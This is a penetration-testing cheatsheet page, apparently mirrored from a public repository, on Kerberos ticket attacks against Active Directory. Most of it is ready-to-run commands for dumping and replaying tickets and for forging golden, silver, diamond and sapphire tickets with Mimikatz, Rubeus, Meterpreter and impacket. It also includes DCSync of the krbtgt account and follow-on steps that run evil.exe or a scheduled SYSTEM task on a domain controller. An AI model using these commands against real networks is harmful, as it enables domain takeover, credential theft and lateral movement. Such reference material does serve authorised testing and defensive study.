daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

kerberos-tickets.md (11272B)


      1 ---
      2 title: "Kerberos - Tickets"
      3 section: "Active Directory"
      4 sectionSlug: "active-directory"
      5 sourcePath: "docs/active-directory/kerberos-tickets.md"
      6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/kerberos-tickets.md"
      7 sha: "203bb0c0b290"
      8 isIndex: false
      9 ---
     10 
     11 # Kerberos - Tickets
     12 
     13 Tickets are used to grant access to network resources. A ticket is a data structure that contains information about the user's identity, the network service or resource being accessed, and the permissions or privileges associated with that resource. Kerberos tickets have a limited lifetime and expire after a set period of time, typically 8 to 12 hours.
     14 
     15 There are two types of tickets in Kerberos:
     16 
     17 * **Ticket Granting Ticket** (TGT): The TGT is obtained by the user during the initial authentication process. It is used to request additional service tickets without requiring the user to re-enter their credentials. The TGT contains the user's identity, a timestamp, and an encryption of the user's secret key.
     18 
     19 * **Service Ticket** (ST): The service ticket is used to access a specific network service or resource. The user presents the service ticket to the service or resource, which then uses the ticket to authenticate the user and grant access to the requested resource. The service ticket contains the user's identity, a timestamp, and an encryption of the service's secret key.
     20 
     21 ## Dump Kerberos Tickets
     22 
     23 * Mimikatz: `sekurlsa::tickets /export`
     24 * Rubeus
     25 
     26   ```ps1
     27   # List available tickets
     28   Rubeus.exe triage
     29 
     30   # Dump one ticket, the output is in Kirbi format
     31   Rubeus.exe dump /luid:0x12d1f7
     32   ```
     33 
     34 ## Replay Kerberos Tickets
     35 
     36 * Mimikatz: `mimikatz.exe "kerberos::ptc C:\temp\TGT_Administrator@lab.local.ccache"`
     37 * netexec: `KRB5CCNAME=/tmp/administrator.ccache netexec smb 10.10.10 -u user --use-kcache`
     38 
     39 ## Convert Kerberos Tickets
     40 
     41 In the Kerberos authentication protocol, ccache and kirbi are two types of Kerberos credential caches that are used to store Kerberos tickets.
     42 
     43 * A credential cache, or `"ccache"` is a temporary storage area for Kerberos tickets that are obtained during the authentication process. The ccache contains the user's authentication credentials and is used to access network resources without having to re-enter the user's credentials for each request.
     44 
     45 * The Kerberos Integrated Windows Authentication (KIWA) protocol used by Microsoft Windows systems also makes use of a credential cache called a `"kirbi"` cache. The kirbi cache is similar to the ccache used by standard Kerberos implementations, but with some differences in the way it is structured and managed.
     46 
     47 While both caches serve the same basic purpose of storing Kerberos tickets to enable efficient access to network resources, they differ in format and structure. You can convert them easily using:
     48 
     49 * kekeo: `misc::convert ccache ticket.kirbi`
     50 * impacket: `impacket-ticketConverter SRV01.kirbi SRV01.ccache`
     51 
     52 ## Pass-the-Ticket Golden Tickets
     53 
     54 A Golden Ticket is a forged Kerberos Ticket Granting Ticket (TGT) that allows an attacker to impersonate any user — including Domain Admins — on a compromised Active Directory domain.
     55 
     56 **Requirements**:
     57 
     58 | Requirement       | Description                                             |
     59 | ----------------- | ------------------------------------------------------- |
     60 | Domain name       | corp.local                                              |
     61 | Domain SID        | S-1-5-21-1234567890-2345678901-3456789012               |
     62 | KRBTGT NTLM hash  | The NTLM hash of the KRBTGT account                     |
     63 | Username          | Administrator                                           |
     64 | (Optional) Groups | Add group SIDs for elevated access (e.g., Domain Admin) |
     65 
     66 As a result of `CVE-2021-42287` mitigations, the ticket cannot use a non-existent account name.
     67 
     68 > The way to forge a Golden Ticket is very similar to the Silver Ticket one. The main differences are that, in this case, no service SPN must be specified to ticketer.py, and the krbtgt NT hash must be used.
     69 
     70 ### Golden Ticket Creation
     71 
     72 * Using **Ticketer**
     73 
     74 ```powershell
     75 python3 ticketer.py -nthash <KRBTGT_NTLM_HASH> \
     76   -domain-sid S-1-5-21-1234567890-2345678901-3456789012 \
     77   -domain corp.local Administrator
     78 
     79 python3 ticketer.py -nthash <KRBTGT_NTLM_HASH> \
     80   -domain-sid S-1-5-21-1234567890-2345678901-3456789012 \
     81   -domain corp.local \
     82   -user-id 500 \
     83   -extra-sid S-1-5-21-1234567890-2345678901-3456789012-512 \
     84   Administrator
     85 ```
     86 
     87 * Using **Mimikatz**
     88 
     89 ```powershell
     90 # Get info - Mimikatz
     91 lsadump::lsa /inject /name:krbtgt
     92 lsadump::lsa /patch
     93 lsadump::trust /patch
     94 lsadump::dcsync /user:krbtgt
     95 
     96 # Forge a Golden ticket - Mimikatz
     97 kerberos::purge
     98 kerberos::golden /user:evil /domain:pentestlab.local /sid:S-1-5-21-3737340914-2019594255-2413685307 /krbtgt:d125e4f69c851529045ec95ca80fa37e /ticket:evil.tck /ptt
     99 kerberos::tgt
    100 ```
    101 
    102 * Using **Meterpreter**
    103 
    104 ```powershell
    105 # Get info - Meterpreter(kiwi)
    106 dcsync_ntlm krbtgt
    107 dcsync krbtgt
    108 
    109 # Forge a Golden ticket - Meterpreter
    110 load kiwi
    111 golden_ticket_create -d <domainname> -k <nthashof krbtgt> -s <SID without le RID> -u <user_for_the_ticket> -t <location_to_store_tck>
    112 golden_ticket_create -d pentestlab.local -u pentestlabuser -s S-1-5-21-3737340914-2019594255-2413685307 -k d125e4f69c851529045ec95ca80fa37e -t /root/Downloads/pentestlabuser.tck
    113 kerberos_ticket_purge
    114 kerberos_ticket_use /root/Downloads/pentestlabuser.tck
    115 kerberos_ticket_list
    116 ```
    117 
    118 Golden tickets with "Enterprise admins" SID can be used cross forest boundaries.
    119 
    120 **Mitigations**:
    121 
    122 * Hard to detect because they are legit TGT tickets
    123 * Mimikatz generate a golden ticket with a life-span of 10 years
    124 
    125 ## Pass-the-Ticket Silver Tickets
    126 
    127 Forging a Service Ticket (ST) require machine account password (key) or NT hash of the service account.
    128 
    129 ```powershell
    130 # Create a ticket for the service
    131 mimikatz $ kerberos::golden /user:USERNAME /domain:DOMAIN.FQDN /sid:DOMAIN-SID /target:TARGET-HOST.DOMAIN.FQDN /rc4:TARGET-MACHINE-NT-HASH /service:SERVICE
    132 
    133 # Examples
    134 mimikatz $ /kerberos::golden /domain:adsec.local /user:ANY /sid:S-1-5-21-1423455951-1752654185-1824483205 /rc4:ceaxxxxxxxxxxxxxxxxxxxxxxxxxxxxx /target:DESKTOP-01.adsec.local /service:cifs /ptt
    135 mimikatz $ kerberos::golden /domain:jurassic.park /sid:S-1-5-21-1339291983-1349129144-367733775 /rc4:b18b4b218eccad1c223306ea1916885f /user:stegosaurus /service:cifs /target:labwws02.jurassic.park
    136 
    137 # Then use the same steps as a Golden ticket
    138 mimikatz $ misc::convert ccache ticket.kirbi
    139 
    140 root@kali:/tmp$ export KRB5CCNAME=/home/user/ticket.ccache
    141 root@kali:/tmp$ ./psexec.py -k -no-pass -dc-ip 192.168.1.1 AD/administrator@192.168.1.100 
    142 ```
    143 
    144 Interesting services to target with a silver ticket :
    145 
    146 | Service Type                               | Service Silver Tickets | Attack                                                                                                           |
    147 | ------------------------------------------ | ---------------------- | ---------------------------------------------------------------------------------------------------------------- |
    148 | WMI                                        | HOST + RPCSS           | `wmic.exe /authority:"kerberos:DOMAIN\DC01" /node:"DC01" process call create "cmd /c evil.exe"`                  |
    149 | PowerShell Remoting                        | CIFS + HTTP + (wsman?) | `New-PSSESSION -NAME PSC -ComputerName DC01; Enter-PSSession -Name PSC`                                          |
    150 | WinRM                                      | HTTP + wsman           | `New-PSSESSION -NAME PSC -ComputerName DC01; Enter-PSSession -Name PSC`                                          |
    151 | Scheduled Tasks                            | HOST                   | `schtasks /create /s dc01 /SC WEEKLY /RU "NT Authority\System" /IN "SCOM Agent Health Check" /IR "C:/shell.ps1"` |
    152 | Windows File Share (CIFS)                  | CIFS                   | `dir \\dc01\c$`                                                                                                  |
    153 | LDAP operations including Mimikatz DCSync  | LDAP                   | `lsadump::dcsync /dc:dc01 /domain:domain.local /user:krbtgt`                                                     |
    154 | Windows Remote Server Administration Tools | RPCSS   + LDAP  + CIFS | /                                                                                                                |
    155 
    156 Mitigations:
    157 
    158 * Set the attribute "Account is Sensitive and Cannot be Delegated" to prevent lateral movement with the generated ticket.
    159 
    160 ## Pass-the-Ticket Diamond Tickets
    161 
    162 > Request a legit low-priv TGT and recalculate only the PAC field providing the krbtgt encryption key
    163 
    164 Requirements:
    165 
    166 * krbtgt NT Hash
    167 * krbtgt AES key
    168 
    169 ```ps1
    170 ticketer.py -request -domain 'lab.local' -user 'domain_user' -password 'password' -nthash 'krbtgt/service NT hash' -aesKey 'krbtgt/service AES key' -domain-sid 'S-1-5-21-...' -user-id '1337' -groups '512,513,518,519,520' 'baduser'
    171 
    172 Rubeus.exe diamond /domain:DOMAIN /user:USER /password:PASSWORD /dc:DOMAIN_CONTROLLER /enctype:AES256 /krbkey:HASH /ticketuser:USERNAME /ticketuserid:USER_ID /groups:GROUP_IDS
    173 ```
    174 
    175 ## Pass-the-Ticket Sapphire Tickets
    176 
    177 > Requesting the target user's PAC with `S4U2self+U2U` exchange during TGS-REQ(P) (PKINIT).
    178 
    179 The goal is to mimic the PAC field as close as possible to a legitimate one.
    180 
    181 Requirements:
    182 
    183 * [Impacket PR#1411](https://github.com/SecureAuthCorp/impacket/pull/1411)
    184 * krbtgt AES key
    185 
    186 ```ps1
    187 # baduser argument will be ignored
    188 ticketer.py -request -impersonate 'domain_adm' -domain 'lab.local' -user 'domain_user' -password 'password' -aesKey 'krbtgt/service AES key' -domain-sid 'S-1-5-21-...' 'baduser'
    189 ```
    190 
    191 ## References
    192 
    193 * [Golden ticket - Pentestlab](https://pentestlab.blog/2018/04/09/golden-ticket/)
    194 * [How Attackers Use Kerberos Silver Tickets to Exploit Systems - Sean Metcalf](https://adsecurity.org/?p=2011)
    195 * [How To Pass the Ticket Through SSH Tunnels - bluescreenofjeff](https://bluescreenofjeff.com/2017-05-23-how-to-pass-the-ticket-through-ssh-tunnels/)
    196 * [Diamond tickets - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/forged-tickets/diamond)
    197 * [A Diamond (Ticket) in the Ruff - By CHARLIE CLARK July 05, 2022](https://www.semperis.com/blog/a-diamond-ticket-in-the-ruff/)
    198 * [Sapphire tickets - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/forged-tickets/sapphire)
    199 * [WONKACHALL AKERVA NDH2018 – WRITE UP PART 1](https://akerva.com/blog/wonkachall-akerva-ndh-2018-write-up-part-1/)
    200 * [WONKACHALL AKERVA NDH2018 – WRITE UP PART 2](https://akerva.com/blog/wonkachall-akerva-ndh2018-write-up-part-2/)
    201 * [WONKACHALL AKERVA NDH2018 – WRITE UP PART 3](https://akerva.com/blog/wonkachall-akerva-ndh2018-write-up-part-3/)
    202 * [WONKACHALL AKERVA NDH2018 – WRITE UP PART 4](https://akerva.com/blog/wonkachall-akerva-ndh2018-write-up-part-4/)
    203 * [WONKACHALL AKERVA NDH2018 – WRITE UP PART 5](https://akerva.com/blog/wonkachall-akerva-ndh2018-write-up-part-5/)
    204 * [How To Attack Kerberos 101 - m0chan - July 31, 2019](https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html)
    205 * [Kerberos (II): How to attack Kerberos? - June 4, 2019 - ELOY PÉREZ](https://www.tarlogic.com/en/blog/how-to-attack-kerberos/)